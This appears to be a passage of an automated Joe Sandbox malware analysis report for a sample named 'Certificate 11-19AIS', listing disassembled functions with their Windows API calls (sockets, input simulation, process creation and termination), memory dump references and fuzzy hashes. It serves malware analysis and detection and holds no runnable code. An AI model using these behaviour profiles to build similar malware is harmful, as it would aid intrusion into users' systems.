                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID:
                                                                              • API String ID: 3311875123-0
                                                                              • Opcode ID: efa4d90981663a61f75330bb228ab46af23a4ee813af2dfaad0f3da93ab5795b
                                                                              • Instruction ID: 0e33531f7a84e0bf52e0ef8595f5310fe26cd806d73b6621e0f7fa96a1be596b
                                                                              • Opcode Fuzzy Hash: efa4d90981663a61f75330bb228ab46af23a4ee813af2dfaad0f3da93ab5795b
                                                                              • Instruction Fuzzy Hash: AA51ADB060130DEBDF20CF68D988BBEBBF4AF44318F144159E6659A391E7789944CB61
                                                                              Function 00808DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0084DC00), ref: 00808E7C
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808E89
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00808EAD
                                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00808EC5
                                                                              • _strlen.LIBCMT ref: 00808EF7
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808F6A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_strlenselect
                                                                              • String ID:
                                                                              • API String ID: 2217125717-0
                                                                              • Opcode ID: eed0109317b7a2279af2816079303197bcc50912baebc44b051d7d566024aa08
                                                                              • Instruction ID: 7668582b6fa48a52ec19bf55f7885e992eaf1fbb1ef75bd81a5c604b5d7567e5
                                                                              • Opcode Fuzzy Hash: eed0109317b7a2279af2816079303197bcc50912baebc44b051d7d566024aa08
                                                                              • Instruction Fuzzy Hash: F4417C71500208EBCB54EBA4CD8AEEEB7B9FB48314F104559F556D72D1DF34AE40CA60
                                                                              Function 007CABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • BeginPaint.USER32(?,?,?), ref: 007CAC2A
                                                                              • GetWindowRect.USER32(?,?), ref: 007CAC8E
                                                                              • ScreenToClient.USER32(?,?), ref: 007CACAB
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007CACBC
                                                                              • EndPaint.USER32(?,?,?,?,?), ref: 007CAD06
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0082E673
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                              • String ID:
                                                                              • API String ID: 2592858361-0
                                                                              • Opcode ID: ca799ef5dc676bd8b2088d0299fd79e102ac1f4baaa5d8a66f473cdd6e9b9be2
                                                                              • Instruction ID: 0b56bdb9b88590a44eb01fcbce7e320c97079280b4e6e71b638de0bc5473a8c8
                                                                              • Opcode Fuzzy Hash: ca799ef5dc676bd8b2088d0299fd79e102ac1f4baaa5d8a66f473cdd6e9b9be2
                                                                              • Instruction Fuzzy Hash: B541C370104305AFCB20DF28DC89FB67BA8FB65725F04066DF9A9C72A1D7359884DB62
                                                                              Function 0081E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00871628,00000000,00871628,00000000,00000000,00871628,?,0082DC5D,00000000,?,00000000,00000000,00000000,?,0082DAD1,00000004), ref: 0081E40B
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0081E42F
                                                                              • ShowWindow.USER32(00871628,00000000), ref: 0081E48F
                                                                              • ShowWindow.USER32(00000000,00000004), ref: 0081E4A1
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0081E4C5
                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0081E4E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 642888154-0
                                                                              • Opcode ID: eab27c1d974287bd3ff8633907572878f2615bc9265a6f7820de1c62556f9247
                                                                              • Instruction ID: 56c059510f481a4d53d868cbda5bc15aba0c3a59d519f1a3f4ad21967ee20936
                                                                              • Opcode Fuzzy Hash: eab27c1d974287bd3ff8633907572878f2615bc9265a6f7820de1c62556f9247
                                                                              • Instruction Fuzzy Hash: 18415E34601950EFDB22CF28D499BD47BE5FF09304F1885A9EE59CF2A2C731A881DB95
                                                                              Function 007F98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 007F98D1
                                                                                • Part of subcall function 007CF4EA: std::exception::exception.LIBCMT ref: 007CF51E
                                                                                • Part of subcall function 007CF4EA: __CxxThrowException@8.LIBCMT ref: 007CF533
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007F9908
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 007F9924
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 007F999E
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007F99B3
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 007F99D2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 2537439066-0
                                                                              • Opcode ID: bb2c476633f409e22894da40de33363c809bbb5c67c1090a23c118e6ace09755
                                                                              • Instruction ID: d0fecb0956c5607d8b6d0f6dc855024663d31b7e3571e3ca3596ac866c4e83fd
                                                                              • Opcode Fuzzy Hash: bb2c476633f409e22894da40de33363c809bbb5c67c1090a23c118e6ace09755
                                                                              • Instruction Fuzzy Hash: 4A318431A00205EBDB10DF94DC89EAFB779FF85710B1580A9FA04AB246D774EE14DBA0
                                                                              Function 00809B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,008077F4,?,?,00000000,00000001), ref: 00809B53
                                                                                • Part of subcall function 00806544: GetWindowRect.USER32(?,?), ref: 00806557
                                                                              • GetDesktopWindow.USER32 ref: 00809B7D
                                                                              • GetWindowRect.USER32(00000000), ref: 00809B84
                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00809BB6
                                                                                • Part of subcall function 007F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                                              • GetCursorPos.USER32(?), ref: 00809BE2
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00809C44
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                              • String ID:
                                                                              • API String ID: 4137160315-0
                                                                              • Opcode ID: e1cf9aaa7b155b058d67ff1df7198aeedb4dd3328f92202a6ab8263eaebca4a7
                                                                              • Instruction ID: de46ac5c6ff9b286ccfd91910ab6e62b056020cad9998c2a8b9cfc589fce5dff
                                                                              • Opcode Fuzzy Hash: e1cf9aaa7b155b058d67ff1df7198aeedb4dd3328f92202a6ab8263eaebca4a7
                                                                              • Instruction Fuzzy Hash: 1531CF72604319ABC710DF18DC49F9AB7EDFF89324F00091AF595D7282EA31EA14CB92
                                                                              Function 007EAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007EAFAE
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 007EAFB5
                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007EAFC4
                                                                              • CloseHandle.KERNEL32(00000004), ref: 007EAFCF
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007EAFFE
                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 007EB012
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                              • String ID:
                                                                              • API String ID: 1413079979-0
                                                                              • Opcode ID: 3fd6bc5892d20a6ef8050c82f8a1b46fb3ee587425a79991d396681d16f37a0e
                                                                              • Instruction ID: 6bb298e7446f1129fb240fc2620ce3d34b12fd86211afbb31d175eb142754aa5
                                                                              • Opcode Fuzzy Hash: 3fd6bc5892d20a6ef8050c82f8a1b46fb3ee587425a79991d396681d16f37a0e
                                                                              • Instruction Fuzzy Hash: 20217C72101249BBCF028FA9ED09FAE7BA9BF48304F144015FA01A2161D37AED21EB61
                                                                              Function 0081EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 007CAFE3
                                                                                • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CAFF2
                                                                                • Part of subcall function 007CAF83: BeginPath.GDI32(?), ref: 007CB009
                                                                                • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CB033
                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0081EC20
                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0081EC34
                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0081EC42
                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0081EC52
                                                                              • EndPath.GDI32(00000000), ref: 0081EC62
                                                                              • StrokePath.GDI32(00000000), ref: 0081EC72
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                              • String ID:
                                                                              • API String ID: 43455801-0
                                                                              • Opcode ID: 3d98187fc0c39b2b6a09a4e09cc28688f281418f4ca94d1dd9f5e0d2316e0982
                                                                              • Instruction ID: bfe4029ade56cb3a814dfd5ba91d23975185dbe4a93823301213578a4cd8de7c
                                                                              • Opcode Fuzzy Hash: 3d98187fc0c39b2b6a09a4e09cc28688f281418f4ca94d1dd9f5e0d2316e0982
                                                                              • Instruction Fuzzy Hash: EB11FA72000149BFDF019FA4EC88EDA7F6DFB08354F048526BE0895160D7719D959BA0
                                                                              Function 007EE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 007EE1C0
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 007EE1D1
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007EE1D8
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 007EE1E0
                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007EE1F7
                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 007EE209
                                                                                • Part of subcall function 007E9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,007E9A05,00000000,00000000,?,007E9DDB), ref: 007EA53A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                                              • String ID:
                                                                              • API String ID: 603618608-0
                                                                              • Opcode ID: f76ded47c94eb580cbc74167192c8a6604398c5eb9075422e159a37213b5dab0
                                                                              • Instruction ID: 94087c7dc96fa14fb3a5bdaa43f66c263cca55f9a7cdcfecfc5a29e4f7c592ee
                                                                              • Opcode Fuzzy Hash: f76ded47c94eb580cbc74167192c8a6604398c5eb9075422e159a37213b5dab0
                                                                              • Instruction Fuzzy Hash: C90184B5A00758BFEB109BA69C45B5EBFB8EB88751F004466FE04A7290D6709C00CBA0
                                                                              Function 007D7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __init_pointers.LIBCMT ref: 007D7B47
                                                                                • Part of subcall function 007D123A: __initp_misc_winsig.LIBCMT ref: 007D125E
                                                                                • Part of subcall function 007D123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 007D7F51
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007D7F65
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007D7F78
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007D7F8B
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007D7F9E
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 007D7FB1
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 007D7FC4
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 007D7FD7
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 007D7FEA
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 007D7FFD
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 007D8010
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 007D8023
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 007D8036
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 007D8049
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 007D805C
                                                                                • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 007D806F
                                                                              • __mtinitlocks.LIBCMT ref: 007D7B4C
                                                                                • Part of subcall function 007D7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0086AC68,00000FA0,?,?,007D7B51,007D5E77,00866C70,00000014), ref: 007D7E41
                                                                              • __mtterm.LIBCMT ref: 007D7B55
                                                                                • Part of subcall function 007D7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,007D7B5A,007D5E77,00866C70,00000014), ref: 007D7D3F
                                                                                • Part of subcall function 007D7BBD: _free.LIBCMT ref: 007D7D46
                                                                                • Part of subcall function 007D7BBD: DeleteCriticalSection.KERNEL32(0086AC68,?,?,007D7B5A,007D5E77,00866C70,00000014), ref: 007D7D68
                                                                              • __calloc_crt.LIBCMT ref: 007D7B7A
                                                                              • GetCurrentThreadId.KERNEL32 ref: 007D7BA3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                              • String ID:
                                                                              • API String ID: 2942034483-0
                                                                              • Opcode ID: 0a66673b31c088eecbad44102e94ee6e16734b6118da2d165a35b87085aa4111
                                                                              • Instruction ID: 15e6f540a46ca7a395b51e27b2ce138dfa8d7b04ddddf89c18a4894b3f3672fd
                                                                              • Opcode Fuzzy Hash: 0a66673b31c088eecbad44102e94ee6e16734b6118da2d165a35b87085aa4111
                                                                              • Instruction Fuzzy Hash: 34F096B210D31299E62C77347D0B64A2BB5AF01730B6046ABF860D53D2FF2D9841C564
                                                                              Function 007B27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007B281D
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 007B2825
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007B2830
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007B283B
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 007B2843
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 007B284B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              • Opcode ID: 29f77901d21eb4bf55cdb89eae537bc676fd77f7d207e0708de2dd8eb3233b68
                                                                              • Instruction ID: ff10aefda7d741d91187bfcc1faa72ee99ea8e944fc7742342526f8e78b4e65a
                                                                              • Opcode Fuzzy Hash: 29f77901d21eb4bf55cdb89eae537bc676fd77f7d207e0708de2dd8eb3233b68
                                                                              • Instruction Fuzzy Hash: F10167B0902B5ABDE3009F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CBE5
                                                                              Function 007F9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 1423608774-0
                                                                              • Opcode ID: d2283813dc5b59196fe3ca7fea214529dd0f1303764a7dd9e24c7b5c03c177e6
                                                                              • Instruction ID: 9ccad3d96ff4c25eae7376d0a6f20a8ebd28cc3d0cbd53b7c7cd734baafe0973
                                                                              • Opcode Fuzzy Hash: d2283813dc5b59196fe3ca7fea214529dd0f1303764a7dd9e24c7b5c03c177e6
                                                                              • Instruction Fuzzy Hash: B0018632101316ABD7151B54FC48EFB776AFFC87017044829F70392190DB68A810DB51
                                                                              Function 007F7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007F7C07
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007F7C1D
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 007F7C2C
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C3B
                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C45
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C4C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              • Opcode ID: 57501f2499a4f8918b4ecccd5cd87a33ff8cb2eecb17a8e3e876694d39fb0482
                                                                              • Instruction ID: 3cd9e410f2dd768d56721cee58073dff6f3819e91df219f70afdfb618ca26bae
                                                                              • Opcode Fuzzy Hash: 57501f2499a4f8918b4ecccd5cd87a33ff8cb2eecb17a8e3e876694d39fb0482
